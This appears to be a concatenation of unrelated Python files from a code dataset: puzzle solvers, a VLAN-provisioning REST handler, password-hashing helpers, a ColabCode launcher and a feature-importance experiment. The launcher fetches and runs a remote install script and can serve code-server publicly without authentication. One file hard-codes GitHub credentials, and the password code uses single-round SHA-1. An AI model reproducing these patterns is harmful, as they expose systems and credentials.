    """Parse the guard log in *fn*, yielding (date, time, action) tuples.

    *action* is a positive guard id for "begins shift", or the SLEEP/AWAKE
    sentinels. Shift starts logged in the evening are normalised to 00:00 of
    the following day, so every record falls in the midnight hour of the
    shift's date.
    """
    record = re.compile(r'^\[(\d+)-(\d+)-(\d+)\s+(\d+):(\d+)\]\s+(.+)$')
    guard = re.compile(r'Guard #(\d+) begins shift')
    with open(fn) as log:
        for line in log:
            year, month, day, hour, minute, action = record.match(line).groups()
            when = date(int(year), int(month), int(day))
            at = time(int(hour), int(minute))
            if action == 'falls asleep':
                code = SLEEP
            elif action == 'wakes up':
                code = AWAKE
            else:
                code = int(guard.match(action).group(1))
            if at > time(12, 0):
                # pre-midnight shift start belongs to the next calendar day
                when += timedelta(days=1)
                at = time(0)
            yield (when, at, code)
def sleep_calendar(input):
    """Collapse the chronologically sorted event stream into shifts.

    Yields one (date, guard_id, minutes) tuple per shift, where *minutes* is
    a 60-element 0/1 list marking the midnight-hour minutes spent asleep.
    """
    shift = None
    for day, moment, action in sorted(input):
        if action > 0:
            # a new guard takes over: flush the previous shift, start fresh
            if shift is not None:
                yield shift
            shift = (day, action, [0] * 60)
        elif action == SLEEP:
            fell_asleep = moment
        elif action == AWAKE:
            # mark [fell_asleep, woke) as slept in this shift's minute map
            first, last = fell_asleep.minute, moment.minute
            shift[2][first:last] = [1 for _ in range(first, last)]
    if shift is not None:
        yield shift
# Accumulate, per guard id, how often they were asleep at each minute of the
# midnight hour across all of their shifts.
guards = {}
for c in sleep_calendar(read_input('day4.txt')):
    guards.setdefault(c[1], [0 for _ in range(60)])
    for i in range(60):
        guards[c[1]][i] += c[2][i]
# Part 1: the guard with the most total minutes asleep, times the minute
# that guard is most often asleep.
winner_guard = max(guards, key=lambda g: sum(guards[g]))
winner_minute = max(enumerate(guards[winner_guard]), key=lambda m: m[1])[0]
print(winner_guard * winner_minute)
# Part 2: the minute with the highest single-guard sleep count, times the
# guard who holds that record.
winner_minute = max(range(60), key=lambda i: max(guards[g][i] for g in guards))
winner_guard = max(guards, key=lambda g: guards[g][winner_minute])
print(winner_minute * winner_guard)
|
993,462 | 2b242afc1610e58df35a42891782fac58101dd48 | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from networkapi.admin_permission import AdminPermission
from networkapi.ambiente.models import AmbienteError
from networkapi.ambiente.models import IP_VERSION
from networkapi.auth import has_perm
from networkapi.equipamento.models import Equipamento
from networkapi.exception import InvalidValueError
from networkapi.grupo.models import GrupoError
from networkapi.infrastructure.script_utils import exec_script
from networkapi.infrastructure.script_utils import ScriptError
from networkapi.infrastructure.xml_utils import dumps_networkapi
from networkapi.infrastructure.xml_utils import loads
from networkapi.infrastructure.xml_utils import XMLError
from networkapi.ip.models import NetworkIPv4
from networkapi.ip.models import NetworkIPv4Error
from networkapi.ip.models import NetworkIPv4NotFoundError
from networkapi.ip.models import NetworkIPv6
from networkapi.ip.models import NetworkIPv6Error
from networkapi.ip.models import NetworkIPv6NotFoundError
from networkapi.rest import RestResource
from networkapi.settings import NETWORKIPV4_CREATE
from networkapi.settings import NETWORKIPV6_CREATE
from networkapi.settings import VLAN_CREATE
from networkapi.util import is_valid_int_greater_zero_param
from networkapi.vlan.models import VlanError
from networkapi.vlan.models import VlanNotFoundError
class VlanCreateResource(RestResource):
    """Runs the provisioning scripts that activate a vlan and one of its
    networks (IPv4 or IPv6) on the routing equipments."""

    log = logging.getLogger('VlanCreateResource')

    def handle_post(self, request, user, *args, **kwargs):
        """Treat POST requests to run script creation for vlan and networks

        URL: vlan/v4/create/ or vlan/v6/create/
        """
        try:
            # Generic method for v4 and v6
            network_version = kwargs.get('network_version')

            # User permission on vlan management
            if not has_perm(user, AdminPermission.VLAN_MANAGEMENT, AdminPermission.WRITE_OPERATION):
                self.log.error(
                    u'User does not have permission to perform the operation.')
                return self.not_authorized()

            # Load XML data
            xml_map, attrs_map = loads(request.raw_post_data)

            # XML data format
            networkapi_map = xml_map.get('networkapi')
            if networkapi_map is None:
                msg = u'There is no value to the networkapi tag of XML request.'
                self.log.error(msg)
                return self.response_error(3, msg)
            vlan_map = networkapi_map.get('vlan')
            if vlan_map is None:
                msg = u'There is no value to the vlan tag of XML request.'
                self.log.error(msg)
                return self.response_error(3, msg)

            # Get XML data
            network_ip_id = vlan_map.get('id_network_ip')

            # Valid network_ip ID
            if not is_valid_int_greater_zero_param(network_ip_id):
                self.log.error(
                    u'Parameter id_network_ip is invalid. Value: %s.', network_ip_id)
                raise InvalidValueError(None, 'id_network_ip', network_ip_id)

            # Network must exist in database
            if IP_VERSION.IPv4[0] == network_version:
                network_ip = NetworkIPv4().get_by_pk(network_ip_id)
            else:
                network_ip = NetworkIPv6().get_by_pk(network_ip_id)

            # An already-active network means everything was provisioned
            if network_ip.active:
                return self.response_error(299)

            # The user also needs write access on every router equipment of
            # the vlan (both address families) before any script may run.
            equips_from_ipv4 = Equipamento.objects.filter(
                ipequipamento__ip__networkipv4__vlan=network_ip.vlan.id, equipamentoambiente__is_router=1)
            equips_from_ipv6 = Equipamento.objects.filter(
                ipv6equipament__ip__networkipv6__vlan=network_ip.vlan.id, equipamentoambiente__is_router=1)
            for equip in list(equips_from_ipv4) + list(equips_from_ipv6):
                if not has_perm(user, AdminPermission.EQUIPMENT_MANAGEMENT, AdminPermission.WRITE_OPERATION, None, equip.id, AdminPermission.EQUIP_WRITE_OPERATION):
                    self.log.error(
                        u'User does not have permission to perform the operation.')
                    return self.not_authorized()

            # Business Rules
            success_map = dict()

            # If the vlan is not active yet it must be created before the
            # network can be.
            if not network_ip.vlan.ativada:
                vlan_command = VLAN_CREATE % (network_ip.vlan.id)
                code, stdout, stderr = exec_script(vlan_command)
                if code == 0:
                    # After the script succeeds, persist the activation
                    network_ip.vlan.activate(user)
                    vlan_success = dict()
                    vlan_success['codigo'] = '%04d' % code
                    vlan_success['descricao'] = {
                        'stdout': stdout, 'stderr': stderr}
                    success_map['vlan'] = vlan_success
                else:
                    return self.response_error(2, stdout + stderr)

            # Make command to create the network
            if IP_VERSION.IPv4[0] == network_version:
                command = NETWORKIPV4_CREATE % (network_ip.id)
            else:
                command = NETWORKIPV6_CREATE % (network_ip.id)

            code, stdout, stderr = exec_script(command)
            if code == 0:
                # After the script succeeds, persist the activation
                network_ip.activate(user)
                network_success = dict()
                network_success['codigo'] = '%04d' % code
                network_success['descricao'] = {
                    'stdout': stdout, 'stderr': stderr}
                success_map['network'] = network_success
            else:
                return self.response_error(2, stdout + stderr)

            # Return XML (renamed from `map`, which shadowed the builtin)
            response_map = dict()
            response_map['sucesso'] = success_map
            return self.response(dumps_networkapi(response_map))

        except InvalidValueError as e:
            return self.response_error(269, e.param, e.value)
        except NetworkIPv4NotFoundError:
            return self.response_error(281)
        except NetworkIPv6NotFoundError:
            return self.response_error(286)
        except VlanNotFoundError:
            return self.response_error(116)
        except XMLError as e:
            self.log.error(u'Error reading the XML request.')
            return self.response_error(3, e)
        except ScriptError as s:
            return self.response_error(2, s)
        except (GrupoError, VlanError, AmbienteError, NetworkIPv6Error, NetworkIPv4Error):
            return self.response_error(1)
|
import requests
# Fetch the Baidu homepage and inspect the cookies the server sets.
res = requests.get("http://www.baidu.com")
print(res.cookies)
# RequestsCookieJar supports dict-style iteration over (name, value) pairs.
for key, value in res.cookies.items():
    print(key + "=" + value)
|
993,464 | 73de781bacf3b0c15b9bc498f966e25458b73739 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 17 21:47:48 2019
@author: jaredgridley
The purpose of this program is to make a framed box based on the input specifications.
"""
import math
character = input("Enter frame character ==> ")
print(character)
height = int(input("Height of box ==> "))
print(height)
width = int(input("Width of box ==> "))
print(width)
dimensions_text = str(width) + "x" + str(height)
#These three variables all have to do with contructing the vertical part of the box
top_border = "{0}\n".format(character * width)
bottom_border = character * width
emptyspace_length = (" " * (width - 2))
text_vertical = math.floor(height / 2)
heightlines_top = "{0}{1}{2}\n".format(character, emptyspace_length, character) * ((height - 2) - text_vertical)
heightlines_bottom = "{0}{1}{2}\n".format(character, emptyspace_length, character) * ((height - 2) - (math.ceil(height/2) - 1))
#Making the horizontal part of the text line of the box
length_left = math.floor((width / 2) - (len(dimensions_text) / 2))
left_filling = "{0}{1}".format(character, (" " * (length_left - 1)))
length_right = width - (length_left + len(dimensions_text))
right_filling = "{0}{1}".format((" " * (length_right - 1)), character)
text_horizontal = "{0}{1}{2}".format(left_filling, dimensions_text, right_filling)
#This is all just setting up the print statement
above_text = ("{0}".format(top_border)) + heightlines_top
text = "{0}\n".format(text_horizontal)
below_text = heightlines_bottom + bottom_border
print("\nBox:")
print(above_text + text + below_text) |
# Run the browser with a visible window; set True for headless scraping.
HEADLESS = False
# Changeable Constants
SEARCH_TERM = 'PS4'
# NOTE(review): price units are not stated here — presumably euros, given
# CURRENCY below; confirm against the code that applies FILTERS.
MIN_PRICE = 1700
MAX_PRICE = 3000
MAX_NB_RESULTS = 50
# Rather Constant Constants
DIRECTORY = 'results'
CURRENCY = '€'
BASE_URL = "https://www.amazon.nl/"
# Price-range filter passed to the search query.
FILTERS = {
    'min': MIN_PRICE,
    'max': MAX_PRICE
}
993,466 | e24616b10433b22a779f7f1913ccb6afd1edbd4f | """
Utils
"""
import logging
def getLoggingLevel(verbosity):
    """Map a -v/-vv style verbosity count to a ``logging`` level.

    0 -> WARNING, 1 -> INFO, 2 or more -> DEBUG; any other value
    (e.g. negative) -> ERROR.
    """
    if verbosity > 1:
        return logging.DEBUG
    return {0: logging.WARNING, 1: logging.INFO}.get(verbosity, logging.ERROR)
|
993,467 | 65808f0747867f43f808777454222cc95d5e7511 | import datetime
import urllib
import random
from django.contrib import auth
from django.contrib.auth.signals import user_logged_in
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.manager import EmptyManager
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import smart_str
from hashlib import sha1 as sha_constructor
from django.utils.translation import ugettext_lazy as _
from django.utils.crypto import constant_time_compare
def get_hexdigest(algorithm, salt, raw_password):
    """
    Returns a string of the hexdigest of the given plaintext password and salt.
    Only 'sha1' is supported here; any other algorithm raises ValueError.
    """
    # normalise both pieces to byte strings before hashing
    raw_password, salt = smart_str(raw_password), smart_str(salt)
    if algorithm == 'sha1':
        # NOTE(security): single-round salted SHA-1 is obsolete for password
        # storage (fast to brute-force). It cannot be swapped out here without
        # invalidating every stored hash, but new code should use a KDF
        # (PBKDF2/bcrypt) and stored hashes should be migrated.
        return sha_constructor(salt + raw_password).hexdigest()
    raise ValueError("Got unknown password algorithm type in password.")
def check_password(raw_password, enc_password):
    """Return True when *raw_password* matches the stored credential.

    *enc_password* is stored as 'algorithm$salt$hexdigest'; the candidate is
    re-hashed with the same algorithm and salt and compared in constant time.
    """
    algorithm, salt, stored_hash = enc_password.split('$')
    candidate_hash = get_hexdigest(algorithm, salt, raw_password)
    return constant_time_compare(stored_hash, candidate_hash)
def set_password(raw_password):
    """Hash *raw_password* into the 'algorithm$salt$hexdigest' storage format.

    The salt is the first five hex characters of a SHA-1 over two
    pseudo-random numbers; the digest is then computed over salt + password.
    """
    algorithm = 'sha1'
    salt = get_hexdigest(algorithm, str(random.random()), str(random.random()))[:5]
    digest = get_hexdigest(algorithm, salt, raw_password)
    return '%s$%s$%s' % (algorithm, salt, digest)
993,468 | 47c85a58692be95e356e455c7c2ea469ecc7d222 | # Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
""" Derive from the offline class and override InDetFlags
"""
__author__ = "J. Masik"
__version__= "$Revision: 1.2 $"
__doc__ = "ConfiguredNewTrackingTrigCuts"
from AthenaCommon.Include import include
_sharedcuts = False
if _sharedcuts:
from InDetRecExample.ConfiguredNewTrackingCuts import ConfiguredNewTrackingCuts as InDetTrigTrackingCuts
else:
from InDetTrigRecExample.InDetTrigTrackingCuts import InDetTrigTrackingCuts
del _sharedcuts
class ConfiguredNewTrackingTrigCuts(InDetTrigTrackingCuts):
    # Intended to point the flags accessor at the trigger flags instead of the
    # offline ones.
    # NOTE(review): the double leading underscore name-mangles this to
    # _ConfiguredNewTrackingTrigCuts__set_indetflags, so it does NOT override
    # a same-named private method of the base class and is never called from
    # base-class code — confirm whether this hook actually takes effect.
    def __set_indetflags(self):
        from InDetTrigRecExample.InDetTrigFlags import InDetTrigFlags
        self.__indetflags = InDetTrigFlags
# Module-level singletons: one pre-configured cut set per trigger scenario.
EFIDTrackingCuts = ConfiguredNewTrackingTrigCuts("Offline")
EFIDTrackingCutsCosmics = ConfiguredNewTrackingTrigCuts("Cosmics")
EFIDTrackingCutsBeamGas = ConfiguredNewTrackingTrigCuts("BeamGas")
EFIDTrackingCutsLowPt = ConfiguredNewTrackingTrigCuts("LowPt")
EFIDTrackingCutsTRT = ConfiguredNewTrackingTrigCuts("TRT")
EFIDTrackingCutsHeavyIon = ConfiguredNewTrackingTrigCuts("HeavyIon")
# L2 reuses the EF "Offline" configuration rather than a dedicated instance.
L2IDTrackingCuts = EFIDTrackingCuts
|
993,469 | f904aa1a24126e7cd5b1fbd931d7d1dda5762298 | #/**********************************************************************/
#/* CSC 280 Programming Project 2 Part 1 */
#/* */
#/* modifier: Dri Torres */
#/* */
#/* filename: Part_2_Assignment_2.py */
# /* modified from: CSC 280 HW #2 lab */
#/* date last modified: 09/29/2013 */
#/* */
#/* action: computes whether specified age is of the legal limit to drive,*/
#/* vote, drink, rent a car, retire, and collect Social Security */
#/* input: the subject's age, entered by the user */
#/* */
#/* */
#/* output: Y for "yes" or N for "no" answering all questions age */
#/* */
#/**********************************************************************/
# Promt user for subject's age
x = int(raw_input("Enter the subject's age now: "))
#Conditional block
if x >= 15:
print "Is subject old enough to drive? \t Y"
else:
print "Is subject old enough to drive? \t N"
if x >= 18:
print "Is the subject old enough to vote? \t Y"
else:
print "Is the subject old enough to vote? \t N"
if x >= 21:
print "Is the subject old enough to drink? \t Y"
else:
print "Is the subject old enough to drink? \t N"
if x >= 25:
print "Is the subject old enough to rent a car? \t Y"
else:
print "Is the subject old enough to rent a car? \t N"
if x >= 50:
print "Is the subject old enough to retire? \t Y"
else:
print "Is the subject old enough to collect SS? \t N"
if x >= 65:
print "Is the subject old enough to collect SS? \t Y"
else:
print "Is the subject old enough to collect SS? \t N"
# Enter the subject's age now: 12
# Is subject old enough to drive? N
# Is the subject old enough to vote? N
# Is the subject old enough to drink? N
# Is the subject old enough to rent a car? N
# Is the subject old enough to collect SS? N
# Is the subject old enough to collect SS? N
# Enter the subject's age now: 15
# Is subject old enough to drive? Y
# Is the subject old enough to vote? N
# Is the subject old enough to drink? N
# Is the subject old enough to rent a car? N
# Is the subject old enough to collect SS? N
# Is the subject old enough to collect SS? N
# Enter the subject's age now: 51
# Is subject old enough to drive? Y
# Is the subject old enough to vote? Y
# Is the subject old enough to drink? Y
# Is the subject old enough to rent a car? Y
# Is the subject old enough to retire? Y
# Is the subject old enough to collect SS? N
# Is subject old enough to drive? Y
# Is the subject old enough to vote? Y
# Is the subject old enough to drink? Y
# Is the subject old enough to rent a car? Y
# Is the subject old enough to retire? Y
# Is the subject old enough to collect SS? Y
|
993,470 | 0ad5bb8dce5ec9f2e66b5a86eaf37bb525084521 | import os
import subprocess
from pyngrok import ngrok
try:
from google.colab import drive
colab_env = True
except ImportError:
colab_env = False
EXTENSIONS = ["ms-python.python", "ms-toolsai.jupyter"]
class ColabCode:
    """Install and launch code-server (VS Code in the browser) and expose it
    through an ngrok tunnel. Intended for Google Colab, where it can also
    mount Google Drive, but runs on any Linux host with wget/sh/fuser.
    """
    def __init__(self, workspace, port=10000, password=None, authtoken=None, mount_drive=False, user_data_dir=None, extensions_dir=None):
        """Configure and immediately start the server.

        workspace      -- folder code-server opens on start
        port           -- local TCP port code-server listens on
        password       -- optional code-server password (auth disabled if None)
        authtoken      -- optional ngrok auth token
        mount_drive    -- mount /content/drive when running inside Colab
        user_data_dir  -- optional --user-data-dir passed to code-server
        extensions_dir -- optional --extensions-dir passed to code-server
        Note: the constructor has heavy side effects — it installs
        code-server, opens the tunnel and then blocks streaming the
        server's output until it exits.
        """
        self.workspace = workspace
        self.port = port
        self.password = password
        self.authtoken = authtoken
        self.user_data_dir = user_data_dir
        self.extensions_dir = extensions_dir
        self._mount = mount_drive
        self._install_code()
        self._install_extensions()
        self._start_server()
        self._run_code()
    def _install_code(self):
        # Download and run the official code-server install script.
        subprocess.run(
            ["wget", "https://code-server.dev/install.sh"], stdout=subprocess.PIPE
        )
        subprocess.run(["sh", "install.sh"], stdout=subprocess.PIPE)
    def _install_extensions(self):
        # Pre-install the extensions listed in the module-level EXTENSIONS.
        for ext in EXTENSIONS:
            subprocess.run(["code-server", "--install-extension", f"{ext}"])
    def _start_server(self):
        # Open an HTTPS ngrok tunnel to the chosen port, dropping any tunnel
        # left over from a previous run first.
        if self.authtoken:
            ngrok.set_auth_token(self.authtoken)
        active_tunnels = ngrok.get_tunnels()
        for tunnel in active_tunnels:
            public_url = tunnel.public_url
            ngrok.disconnect(public_url)
        # NOTE(review): newer pyngrok releases replaced the `options=` dict
        # with direct keyword arguments (e.g. bind_tls) — confirm the pinned
        # pyngrok version still accepts this form.
        url = ngrok.connect(addr=self.port, options={"bind_tls": True})
        print(f"Code Server can be accessed on: {url}")
    def _run_code(self):
        # Free the port, optionally mount Drive, then exec code-server and
        # stream its stdout line by line until it terminates.
        os.system(f"fuser -n tcp -k {self.port}")
        if self._mount and colab_env:
            drive.mount("/content/drive")
        prefix, options = [], [f"--port {self.port}", "--disable-telemetry"]
        if self.password:
            # code-server reads its password from the PASSWORD env variable
            prefix.append(f"PASSWORD={self.password}")
        else:
            options.append("--auth none")
        if self.user_data_dir:
            options.append(f"--user-data-dir {self.user_data_dir}")
        if self.extensions_dir:
            options.append(f"--extensions-dir {self.extensions_dir}")
        prefix_str = " ".join(prefix)
        options_str = " ".join(options)
        code_cmd = f"{prefix_str} code-server {options_str} {self.workspace}"
        print(code_cmd)
        with subprocess.Popen(
            [code_cmd],
            shell=True,
            stdout=subprocess.PIPE,
            bufsize=1,
            universal_newlines=True,
        ) as proc:
            for line in proc.stdout:
                print(line, end="")
|
993,471 | 0857288303119f87eb6ae98c34e9db0435151f58 | from uuid import UUID
from pvm.activities.activity import Activity
from pvm.transition import Transition
class Cycle(Activity):
    """A self-looping activity node.

    At construction the node wires a reserved transition whose source and
    destination are both the node itself, registered as an incoming and an
    outgoing transition.
    """
    def __init__(self, name: str, id: UUID = None):
        super(Cycle, self).__init__(name, id)
        # reserved self-loop transition: node -> itself
        self._reserved_transition = Transition()
        self._reserved_transition.source = self
        self._reserved_transition.destination = self
        self.add_incoming_transition(self._reserved_transition)
        # Register via the base class deliberately: the override below would
        # attach the negated loop predicate, which must not guard the loop
        # transition itself.
        super(Cycle, self).add_outgoing_transition(self._reserved_transition)
        self._reserved_predicate = None
    def set_predicate(self, predicate):
        """Set the predicate guarding the self-loop transition.

        While *predicate* holds, the reserved self-transition is enabled;
        normal outgoing transitions (see add_outgoing_transition) carry its
        negation, so the two directions are mutually exclusive.
        """
        self._reserved_predicate = predicate
        self._reserved_transition.add_predicate(predicate)
    def add_outgoing_transition(self, transition):
        # Every ordinary exit is additionally guarded by "loop predicate is
        # false", so the node can only be left once the loop condition fails.
        # NOTE(review): if set_predicate was never called,
        # _reserved_predicate is None and evaluating this guard raises
        # TypeError — confirm callers always set the predicate first.
        transition.add_predicate(lambda t: not self._reserved_predicate(t))
        super(Cycle, self).add_outgoing_transition(transition)
|
993,472 | e9e03c0f9e0d193e84555bfd7da9c1f1e8231687 | '''
Created on 11 Mar 2019
@author: olma
'''
import math
class Line():
    """A 2-D line segment defined by two (x, y) endpoint tuples."""
    def __init__(self, coor1, coor2):
        """Store the endpoints; each is an (x, y) tuple."""
        self.coor1 = coor1
        self.coor2 = coor2
    def distance(self):
        """Print and return the Euclidean length of the segment."""
        x1, y1 = self.coor1
        x2, y2 = self.coor2
        length = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)
        print(length)
        return length
    def slope(self):
        """Print and return the slope dy/dx.

        Raises ZeroDivisionError for a vertical segment, exactly as before.
        """
        x1, y1 = self.coor1
        x2, y2 = self.coor2
        gradient = (y2 - y1) / (x2 - x1)
        print(gradient)
        return gradient
|
993,473 | 798efccd8ecc2e728f637da3a475e89511f88b15 | ## This function rotates a list k amount of times without generating a new array.
## e.g [1,2,3,4,5], k = 2 --> [3,4,5,1,2]
def rotateList(nums, k):
# pop(0) deletes the first object in nums
while k > 0:
temp = nums.pop(0)
nums.append(temp)
k -= 1
return nums
if __name__ == "__main__":
nums = [1,2,3,4,5]
print(rotateList(nums, 2)) |
993,474 | e88690b92280679a4fd4e908a35504ab10189294 |
# Connection settings shared by the test cases.
# NOTE(security): credentials are hard-coded here; move them into an
# untracked config file or environment variables.
global_data = {
    'host': 'api.github.com',
    'user': 'amitdad36',
    'password': 'amit036198823',
}
# Test case 1: create a gist via POST /gists.
# NOTE(review): `template_api` is not defined in this chunk — presumably
# provided elsewhere in the suite; verify before running, otherwise this
# raises NameError at import time.
tc1 = {
    'method': 'post',
    'url': '/gists',
    'body': template_api['create_gist']
}
|
def foo(x):
    """Return the square of ``x``."""
    return x ** 2
# Python 2 print statement: squares 8.0 -> 64.0
print foo(8.0)
993,476 | 96531ce3bc3611d0063b8c7ef53f5bde09052a1c | import os
import shap
import torch
import numpy as np
import simple_influence
from scipy.stats import pearsonr, spearmanr
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, normalize
from eli5.permutation_importance import get_score_importances
# NOTE(review): setting PYTHONHASHSEED at runtime only affects *child*
# interpreters; the current process fixed its hash seed at startup —
# confirm this does what the author intended for reproducibility.
os.environ['PYTHONHASHSEED'] = str(1234567890)
# Enumerate GPUs in PCI bus order and expose only the first device.
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
def gen_data():
    """Generate a random binary-classification dataset.

    Returns the 80/20 train/test split as (X, x_test, y, y_test).
    Sample count, cluster count, class separation and hypercube placement
    are all drawn at random; the feature count is pinned at 20.
    """
    n_samples = np.random.randint(100, 5000)
    # n_samples = 1000
    print('Number of Samples in DS: ' + str(n_samples))
    # NOTE(review): the draw below is immediately overridden to pin n_feats
    # at 20; the draw is presumably kept so the global RNG stream matches
    # earlier experiments — confirm before deleting the dead line.
    n_feats = np.random.choice([10, 20, 50, 100], 1).item()
    n_feats = 20
    n_clusters = np.random.randint(2, 14)
    # class separation in [0, 5): larger values make the task easier
    sep = 5 * np.random.random_sample()
    hyper = np.random.choice([True, False], 1).item()
    X, y = make_classification(n_samples, n_features=n_feats, n_informative=n_feats // 2,
                               n_redundant=0, n_repeated=0, n_classes=2, n_clusters_per_class=n_clusters,
                               weights=None, flip_y=0, class_sep=sep, hypercube=hyper, shift=0, scale=1, shuffle=False)
    X, x_test, y, y_test = train_test_split(X, y, test_size=0.2)
    return X, x_test, y, y_test
class shallow_model(torch.nn.Module):
    """One-hidden-layer classifier: Linear -> SELU -> Linear (raw logits)."""
    def __init__(self, n_feats, n_nodes, n_classes):
        super(shallow_model, self).__init__()
        self.lin1 = torch.nn.Linear(n_feats, n_nodes)
        self.lin_last = torch.nn.Linear(n_nodes, n_classes)
        self.selu = torch.nn.SELU()
    def forward(self, x):
        hidden = self.selu(self.lin1(x))
        return self.lin_last(hidden)
    def score(self, x, y):
        """Return argmax-prediction accuracy on (x, y).

        Accepts either torch tensors or numpy arrays; numpy inputs are
        converted and moved to the model's device first.
        """
        device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
        if not torch.is_tensor(x):
            x = torch.from_numpy(x).float().to(device)
            y = torch.from_numpy(y).long().to(device)
        probs = torch.nn.functional.softmax(self.forward(x), dim=1)
        accuracy = torch.sum(torch.argmax(probs, dim=1) == y) / len(x)
        return accuracy.cpu().numpy()
def train_net(dataset, nodes, n_epochs):
    """Train a full-feature classifier plus one leave-one-feature-out model per feature.

    Returns:
        - np.hstack(accs): per-feature LOO test accuracies (the "ground truth"
          feature importances used by main()),
        - classifier_all_feats: the model trained on all features,
        - (train_acc, test_acc) of the all-features model,
        - the dataset tuple passed in.
    Requires a CUDA device ('cuda:0' is hard-coded).
    """
    x_train, x_test, y_train, y_test = dataset
    accs = list()
    device = 'cuda:0'
    scaler = StandardScaler()
    x_train_loo_scaled = scaler.fit_transform(x_train)
    x_test_loo_scaled = scaler.transform(x_test)
    classifier_all_feats = shallow_model(x_train.shape[1], nodes, len(np.unique(y_train))).to(device)
    criterion = torch.nn.CrossEntropyLoss()
    optimizer = torch.optim.Adam(classifier_all_feats.parameters(), lr=1e-3, weight_decay=0.001)
    # Full-batch training of the all-features reference model.
    for _ in range(n_epochs):
        optimizer.zero_grad()
        logits = classifier_all_feats(torch.from_numpy(x_train_loo_scaled).float().to(device))
        loss = criterion(logits, torch.from_numpy(y_train).long().to(device))
        loss.backward()
        optimizer.step()
    train_acc = classifier_all_feats.score(x_train_loo_scaled, y_train)
    test_acc = classifier_all_feats.score(x_test_loo_scaled, y_test)
    # Retrain from scratch with feature i removed; the drop in test accuracy
    # relative to test_acc is the ground-truth importance of feature i.
    for i in range(x_train.shape[1]):
        scaler = StandardScaler()
        x_train_loo = np.delete(x_train, i, axis=1)
        x_test_loo = np.delete(x_test, i, axis=1)
        x_train_loo_scaled = scaler.fit_transform(x_train_loo)
        x_test_loo_scaled = scaler.transform(x_test_loo)
        classifier = shallow_model(x_train_loo.shape[1], nodes, len(np.unique(y_train))).to(device)
        criterion = torch.nn.CrossEntropyLoss()
        optimizer = torch.optim.Adam(classifier.parameters(), lr=1e-3, weight_decay=0.001)
        for _ in range(n_epochs):
            optimizer.zero_grad()
            logits = classifier(torch.from_numpy(x_train_loo_scaled).float().to(device))
            loss = criterion(logits, torch.from_numpy(y_train).long().to(device))
            loss.backward()
            optimizer.step()
        accs.append(classifier.score(torch.from_numpy(x_test_loo_scaled).float().to(device), torch.from_numpy(y_test).long().to(device)))
        # print('{}/{}'.format(i+1, x_train.shape[1]))
    return np.hstack(accs), classifier_all_feats, (train_acc, test_acc), (x_train, x_test, y_train, y_test)
def influence_approx(dataset, classifier):
    """Influence-function feature attribution via simple_influence.i_pert_loss.

    Standardizes the data and delegates to the project-local simple_influence
    module ("eqn_5" presumably refers to the perturbation-loss equation of the
    influence-functions paper — confirm against simple_influence).
    """
    x_train, x_test, y_train, y_test = dataset
    scaler = StandardScaler()
    x_train_scaled = scaler.fit_transform(x_train)
    x_test_scaled = scaler.transform(x_test)
    eqn_5 = simple_influence.i_pert_loss(x_train_scaled, y_train, x_test_scaled, y_test, classifier)
    return eqn_5
def gradient_shap(dataset, classifier):
    """SHAP attributions for the test set using shap.GradientExplainer.

    Moves the model and standardized data onto 'cuda:0' (hard-coded) and
    returns the raw shap_values structure (one array per output class).
    """
    device = 'cuda:0'
    classifier.to(device)
    x_train, x_test, y_train, y_test = dataset
    scaler = StandardScaler()
    x_train_scaled = torch.from_numpy(scaler.fit_transform(x_train)).float().to(device)
    x_test_scaled = torch.from_numpy(scaler.transform(x_test)).float().to(device)
    explainer = shap.GradientExplainer(classifier, x_train_scaled, local_smoothing=0.2)
    shap_values = explainer.shap_values(x_test_scaled, nsamples=100)
    return shap_values
def permutation_importance(dataset, classifier):
    """Permutation feature importances via eli5.get_score_importances.

    Uses the model's own score() as the metric; returns the mean score drop
    per feature averaged over eli5's shuffling iterations.
    """
    device = 'cuda:0'
    classifier.to(device)
    x_train, x_test, y_train, y_test = dataset
    scaler = StandardScaler()
    x_train_scaled = scaler.fit_transform(x_train)
    x_test_scaled = scaler.transform(x_test)
    base_score, score_decreases = get_score_importances(classifier.score, x_test_scaled, y_test)
    perm_importances = np.mean(score_decreases, axis=0)
    return perm_importances
def get_accs(n_feats, observations):
    """Fraction of the informative features recovered by each attribution vector.

    make_classification (shuffle=False) places the informative features first,
    so the ground-truth set is the first n_feats // 2 indices.  For each
    observation we take its top n_feats // 2 features by absolute score and
    measure the overlap with that set.
    """
    k = n_feats // 2
    informative = set(range(k))
    return [
        len(informative & set(np.argsort(abs(obs))[::-1][:k])) / k
        for obs in observations
    ]
def get_pearson(truth, test_acc, observations):
    """Pearson correlation between LOO accuracy drops and each attribution.

    The third observation (index 2, permutation importance) is already an
    accuracy drop, so it is compared as ``test_acc - obs``; the others are
    compared via their absolute magnitudes.
    Returns parallel lists of statistics and p-values.
    """
    stats, pvalues = [], []
    drop = test_acc - truth
    for idx, obs in enumerate(observations):
        reference = test_acc - obs if idx == 2 else np.abs(obs)
        r, p = pearsonr(drop, reference)
        stats.append(r)
        pvalues.append(p)
    return stats, pvalues
def get_spearman(truth, test_acc, observations):
    """Spearman rank correlation between LOO accuracy drops and attributions.

    Both sides are passed through np.argsort first, so the correlation is
    computed on rank orderings.  Returns parallel lists (stats, p-values).
    """
    drop_order = np.argsort(test_acc - truth)
    pairs = [spearmanr(drop_order, np.argsort(np.abs(obs))) for obs in observations]
    stat = [r for r, _ in pairs]
    pvalue = [p for _, p in pairs]
    return stat, pvalue
def main():
    """Run the full experiment grid: datasets x network widths.

